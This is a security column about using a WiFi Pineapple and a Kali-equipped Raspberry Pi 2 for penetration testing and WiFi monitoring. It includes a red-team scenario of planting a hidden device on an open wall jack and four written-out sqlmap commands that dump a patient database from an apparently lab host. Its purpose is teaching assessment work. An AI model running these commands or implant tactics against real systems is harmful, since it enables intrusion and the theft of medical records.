Prerequisites
Wifi Pineapple
Raspberry Pi 2
Introduction
You could call this
particular column the Internet of Toolsmith. As much as I am a curmudgeonly
buzzword, catch-phrase hater (I lose my mind at RSA and refuse to go any more),
the Internet of Things, or IoT is all the rage for good reason. Once obscure
items are now connected and as such, at risk. The ability to load a full
operating system and a plethora of functionality on a micro device has become
trivial thanks to the likes of Raspberry Pi and Arduino. I’d like to point out
that the Pwnie Express PwnPlug Elite, built on a Sheevaplug, as discussed in March
2012’s toolsmith,
was amongst those devices that met the IoT bar before IoT was all the rage.
Kudos to that crazy pack o’ hackers for seeing the imminent future of security
challenges with smart devices. In 2013 Chris Clearfield wrote Rethinking Security for the Internet ofThings wherein
he stated that “the growing Internet of Things, the connection of physical
devices to the internet, will rapidly expand the number of connected devices
integrated into our everyday lives. They also have the potential to allow cyber
attackers into the physical world in which we live as they seize on security
holes in these new systems.” It is in that mindset that we’ll converge security
assessment tools and services, as implemented on a couple of tiny devices I’m
fond of, with ISSA Journal’s topic of the month. Normally, toolsmith focuses on
free and open source tools, and the software we’ll discuss this month continues
to meet that bar. That said, it’s impossible to explore IoT without some
related “things”, so you’ll need to make a small investment in one or both of
the devices we’ll discuss, or experiment similarly on related platforms. If you
were to purchase the Wifi Pineapple and the Raspberry Pi 2 (RPI2) kits I own,
you’d spend a grand total of $229. Much as the Pwnie Express crew did, the hak5
team started building WiFi penetration testing platforms on tiny hardware as
early as 2008. The Raspberry Pi project has enabled all sorts of makers to
build miniature attack or assessment systems on devices the size of a pack of
playing cards. We’ll drop Kali Linux on a Raspberry Pi 2 here. I chuckled a bit
as I wrote this as I was reminded that WiFi Pineapple, intended for WFi
hacking, was itself popped at Defcon 22. The
language in the resulting message is too salty to print here but it starts with
“Dear Lamer” and ends with “criminally insecure” which should convey the
general concepts. ;-) That said, the Hak5 team addressed the issues quickly,
and the device really is a sound, capable investment; let’s start there.
WiFi Pineapple
Figure 1 – WiFi Pineapple |
Wifi Pineapple use is about
as easy as plugging in, connecting the included Cat5 cable to a DHCP-enabled
NIC, and browsing to http://172.16.42.1:1471.
“The WiFi Pineapple firmware is a heavily modified version of OpenWRT, packed with
tools to aid your pen testing.” Initial
username is root, you’ll assign a password during initial setup. I did flash my
Pineapple to the latest firmware, 2.3.0 as this was written, using the WiFi
Pineapple MK5 Infusion. Using the Network Infusion, I put my Pineapple in
Client Mode, so I could connect to the Internet for updates and install
additional Infusions. Using the AutoSSG Infusion I setup the AutoSSH service so
I could interact with a remote shell and download/upload file via SCP. Real fun
with a Wifi Pineapple can be had when you add Infusions. I immediately added sitesurvey, status, monitor,
logcheck, connectedclients, notify, and wifimanager as seen in Figure 2.
Figure 2 – Installing Infusions |
Make sure you install all
Infusions to SD storage as there is much more available in the SD card, you’ll
quickly clog internal storage if you’re not careful.
While WiFI Pineapple is first
and foremost a Wifi attack platform, I believe it can be used as a defensive
platform as well, in particular a monitoring sensor particularly in an area
where many WiFi connected devices are in play and you’d like to monitor the
local IoT.
In the Logs Infusion I
followed the /tmp/pineap.log which logs probes for SSIDs by MAC addresses.
The PineAP Infusion, with MK5
Karma enabled, will allow you to filter under the Log tab as well. From the
Pineapple information content under the PineAP Infusion states that “MK5 Karma
is a module of the PineAP suite intended to host spoofed Access Points, or
honeypots. This is achieved by replying to probe requests with appropriately
crafted probe responses.” You can tweak MK5 Karma and Pine AP as a honeypot to
ensure only trusted, known devices connect in your environment. You can then blacklist
and whitelist both clients and SSIDs, then send notifications via email or
Pushover based on specific rules if you so choose. All the related Infusions
are noted in Figure 3.
Figure 3 – Monitor and notify with Pineapple Infusions |
As a result, WiFi Pineapple, while a fantastic red team
tool, can also be used for defensive monitoring in a highly connected
environment where only trusted devices are a requirement.
Raspberry Pi 2
Loading Kali on a Raspberry Pi 2 is also quite simple and
is spelled out nicely on Kali.org. Grab a
Class 10 SD card and DD the latest image to the card from a *nix host. I ran dd if= kali-1.1.0-rpi2.img of=/dev/sdb
bs=512k, used gparted to
allocate (resize) all the available storage on my 32GB SD, popped the SD card
in my RPI2, and powered it up. You’ll login as root,
initial password is toor as
expected (change it), then execute startx.
Follow the steps in the Kali.org guidance to change your SSH keys as all ARM
images are pre-configured with the same keys. Initially, this installation is
missing almost all of the Kali packages, easily fixed as follows:
1) apt-get update
2) apt-get upgrade
3) apt-get install kali-linux-full
A bit of patience as kali-linux-full exceeds 3GB, and
voila, you’re running Kali on a kick@$$ wallet-sized computer!
Here’s a scenario I imagine a RPI2 being useful in for a
penetration test/red team exercises, given that it is both inexpensive and
concealable. You’re assessing an organization that has a significant public
area (lobby, customer services offices, conference rooms, and auditorium). The
organization offers guest WiFi and does not lock down numerous Cat5 wall jacks.
Your recon determines that:
1) There
is a keys-to-the-castle health services database on the internal organization
network that is your ultimate goal and primary agenda for the assessment
2) There
is a location in the public space near a cabinet and a large plant where a WiFi
enabled RPI2 (Figure 4) can be plugged into both power and one of the
unregulated wall jacks. Even if discovered in a day or two, you only need a few
hours.
Figure 4 – Raspberry Pi 2 (in camera support case) |
After “installing” your device, you can access it over
the public WiFI as wlan0 is serving up SSH in the same IP range as your laptop.
You’re simply sitting in the organizations public café, seemingly browsing the
Intarwebs during lunch. As an added bonus, you find that the wired connection
to your RPI2 enjoys unfettered access to the internal (Intranet) environment.
You nmap it accordingly and discover a few hosts offering up HTTP and HTTPS.
You can kick in a little X11 forwarding on your RPI2 or tunnel through your
RPI2 and browse the sites directly from your laptop in the café. Sure enough,
after a bit of review, you discover that one of these web servers hosts the
front end for that health services database you seek. You quickly recognize
that the Security Development Lifecycle long ago left the building (may never
have entered) and that this front end is rampant with SQL injections vulns. You
ready SQLmap and strike while the iron is hot. You run the following from your
RPI2 and in four quick steps have dumped the patient db. Great, now you have to
write the report.
1) sqlmap.py
--url="http://vlab02.pneumann.com/patients13/?bill_month=8&sec=HSPO14"
--data="bill_month" --banner
2) sqlmap.py
--url="http://vlab02.pneumann.com/patients13/?bill_month=8&sec=HSPO14"
--data="bill_month" --dbs
3) sqlmap.py
--url="http://vlab02.pneumann.com/patients13/?bill_month=8&sec=HSPO14"
--data="bill_month" -D db337433205 --tables
4) sqlmap.py --url="http://vlab02.pneumann.com/patients13/?bill_month=8&sec=HSPO14"
--data="bill_month" --dump -D db337433205 -T dbo337433205.PATIENTS
The above gives you the database banner, the populated
databases, the tables in the db337433205
database, and then,yep, there’s the proverbial gold in that dump (Figure
5).
Figure 5 – SQLmap strikes gold from Kali on Raspberry Pi 2 |
This is but one example of an endless slew of
opportunities running Kali and other distros from this credit card-sized
device. Grab some spare SD cards and build out a few of your favorites, then
swap them in as you want to boot them up. Some RPI2 kits come with NOOBS on an
8GB SD card as well, which will help get you started and your feet wet.
Hackers/makers rejoice! I’m going to add sensors and a camera to my kit so I
can implement specific scripted actions when movement initiated.
In Conclusion
Working with the Raspberry Pi 2 or earlier versions allows
you so many options. You’ll recall that FruityWifi, as discussed in November
2014, is specifically tailored to Raspberry Pi, and there are Pwn Pi, Raspberry
Pwn (from Pwnie Express), and MyLittlePwny, amongst others. Grab a kit today
and get started, it’ll be great for your Linux skills development, and can be
used for attack or defense; the options are literally endless. I’d also be
remiss if I didn’t mention that Microsoft is releasing Windows 10 for IoT (Windows
10 IoT Core), currently in Insider Preview mode, so you can play on the Windows
front as well.
Ping me via email or Twitter if you have questions (russ
at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.